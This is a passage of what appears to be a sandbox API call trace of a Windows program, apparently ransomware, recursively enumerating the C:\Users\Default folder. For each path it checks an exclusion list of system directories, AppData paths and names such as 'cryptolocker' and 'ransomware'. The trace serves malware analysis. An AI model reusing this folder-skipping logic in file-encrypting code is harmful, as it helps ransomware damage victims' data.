lpSrch="crypt_detect") returned 0x0 [0119.124] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="cryptolocker") returned 0x0 [0119.124] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="ransomware") returned 0x0 [0119.124] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="C:\\WINDOWS") returned 0x0 [0119.124] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.124] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="C:\\Program Files") returned 0x0 [0119.124] GetProcessHeap () returned 0xe30000 [0119.124] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4a2) returned 0x6874278 [0119.124] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0119.124] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\*", cchMax=1058 | out: psz1="C:\\Users\\Default\\*") returned="C:\\Users\\Default\\*" [0119.124] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0119.124] StrCmpW (psz1=".", psz2=".") returned 0 [0119.124] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.124] StrCmpW (psz1="..", psz2=".") returned 1 [0119.124] StrCmpW (psz1="..", psz2="..") returned 0 [0119.125] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0119.125] StrCmpW (psz1="AppData", psz2=".") returned 1 [0119.125] StrCmpW (psz1="AppData", psz2="..") returned 1 [0119.125] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0119.125] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0119.125] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="AppData", cchMax=1058 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\windows\\system32\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\windows\\system\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\appdata\\local\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch=":\\boot\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch=":\\perflogs\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch=":\\programdata\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch=":\\drivers\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch=":\\wsus\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="crypt_detect") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="cryptolocker") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="ransomware") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="C:\\WINDOWS") returned 0x0 [0119.125] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.126] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="C:\\Program Files") returned 0x0 [0119.126] GetProcessHeap () returned 0xe30000 [0119.126] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xef3600 [0119.126] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default\\AppData", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0119.126] StrNCatW (in: psz1="C:\\Users\\Default\\AppData", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\*") returned="C:\\Users\\Default\\AppData\\*" [0119.126] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1b30 [0119.126] StrCmpW (psz1=".", psz2=".") returned 0 [0119.126] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.126] StrCmpW (psz1="..", psz2=".") returned 1 [0119.126] StrCmpW (psz1="..", psz2="..") returned 0 [0119.126] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0119.126] StrCmpW (psz1="Local", psz2=".") returned 1 [0119.126] StrCmpW (psz1="Local", psz2="..") returned 1 [0119.126] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default\\AppData", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0119.126] StrNCatW (in: psz1="C:\\Users\\Default\\AppData", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0119.126] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\", psz2="Local", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0119.126] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\windows\\system32\\") returned 0x0 [0119.126] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.126] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\windows\\system\\") returned 0x0 [0119.126] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.126] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.126] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\appdata\\local\\") returned 0x0 [0119.126] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.126] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.126] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.127] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch=":\\boot\\") returned 0x0 [0119.127] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch=":\\perflogs\\") returned 0x0 [0119.127] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch=":\\programdata\\") returned 0x0 [0119.127] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch=":\\drivers\\") returned 0x0 [0119.127] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch=":\\wsus\\") returned 0x0 [0119.127] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.127] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.127] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="crypt_detect") returned 0x0 [0119.127] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="cryptolocker") returned 0x0 [0119.127] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="ransomware") returned 0x0 [0119.127] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="C:\\WINDOWS") returned 0x0 [0119.127] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.127] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="C:\\Program Files") returned 0x0 [0119.127] GetProcessHeap () returned 0xe30000 [0119.127] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4be) returned 0xed39f8 [0119.127] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\AppData\\Local", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0119.127] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local", psz2="\\*", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\*") returned="C:\\Users\\Default\\AppData\\Local\\*" [0119.127] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec18b0 [0119.127] StrCmpW (psz1=".", psz2=".") returned 0 [0119.127] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.128] StrCmpW (psz1="..", psz2=".") returned 1 [0119.128] StrCmpW (psz1="..", psz2="..") returned 0 [0119.128] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0119.128] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0119.128] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0119.128] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0119.128] StrCmpW (psz1="History", psz2=".") returned 1 [0119.128] StrCmpW (psz1="History", psz2="..") returned 1 [0119.128] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3af063e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6dc3522, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0119.128] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0119.128] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0119.128] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\AppData\\Local", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0119.128] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local", psz2="\\", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\") returned="C:\\Users\\Default\\AppData\\Local\\" [0119.128] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local\\", psz2="Microsoft", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\Microsoft") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft" [0119.128] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system32\\") returned 0x0 [0119.128] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.128] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system\\") returned 0x0 [0119.128] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.128] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.128] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Microsoft" [0119.128] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8b6f3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0119.128] StrCmpW (psz1="Temp", psz2=".") returned 1 [0119.128] StrCmpW (psz1="Temp", psz2="..") returned 1 [0119.128] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\AppData\\Local", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0119.128] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local", psz2="\\", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\") returned="C:\\Users\\Default\\AppData\\Local\\" [0119.128] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local\\", psz2="Temp", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\Temp") returned="C:\\Users\\Default\\AppData\\Local\\Temp" [0119.128] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Temp", lpSrch="\\windows\\system32\\") returned 0x0 [0119.128] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Temp", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.128] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Temp", lpSrch="\\windows\\system\\") returned 0x0 [0119.128] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Temp", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.143] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Temp", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.143] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Temp", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Temp" [0119.143] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0119.143] StrCmpW (psz1="Temporary Internet Files", psz2=".") returned 1 [0119.143] StrCmpW (psz1="Temporary Internet Files", psz2="..") returned 1 [0119.143] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0119.143] FindClose (in: hFindFile=0xec18b0 | out: hFindFile=0xec18b0) returned 1 [0119.143] GetProcessHeap () returned 0xe30000 [0119.143] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.143] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0119.143] StrCmpW (psz1="Roaming", psz2=".") returned 1 [0119.143] StrCmpW (psz1="Roaming", psz2="..") returned 1 [0119.143] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default\\AppData", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0119.143] StrNCatW (in: psz1="C:\\Users\\Default\\AppData", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0119.143] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\", psz2="Roaming", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\Roaming") returned="C:\\Users\\Default\\AppData\\Roaming" [0119.143] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\windows\\system32\\") returned 0x0 [0119.143] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.143] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\windows\\system\\") returned 0x0 [0119.143] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.143] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.143] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\appdata\\local\\") returned 0x0 [0119.143] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.143] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.143] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.143] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch=":\\boot\\") returned 0x0 [0119.143] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch=":\\perflogs\\") returned 0x0 [0119.144] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch=":\\programdata\\") returned 0x0 [0119.144] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch=":\\drivers\\") returned 0x0 [0119.144] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch=":\\wsus\\") returned 0x0 [0119.144] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.144] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.144] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="crypt_detect") returned 0x0 [0119.144] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="cryptolocker") returned 0x0 [0119.144] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="ransomware") returned 0x0 [0119.144] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="C:\\WINDOWS") returned 0x0 [0119.144] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.144] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Roaming", lpSrch="C:\\Program Files") returned 0x0 [0119.144] GetProcessHeap () returned 0xe30000 [0119.144] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c2) returned 0xed39f8 [0119.144] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\AppData\\Roaming", cchMax=1090 | out: psz1="C:\\Users\\Default\\AppData\\Roaming") returned="C:\\Users\\Default\\AppData\\Roaming" [0119.144] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Roaming", psz2="\\*", cchMax=1090 | out: psz1="C:\\Users\\Default\\AppData\\Roaming\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\*" [0119.144] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1df0 [0119.144] StrCmpW (psz1=".", psz2=".") returned 0 [0119.144] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.144] StrCmpW (psz1="..", psz2=".") returned 1 [0119.144] StrCmpW (psz1="..", psz2="..") returned 0 [0119.144] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0119.144] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0119.144] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0119.144] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Microsoft", 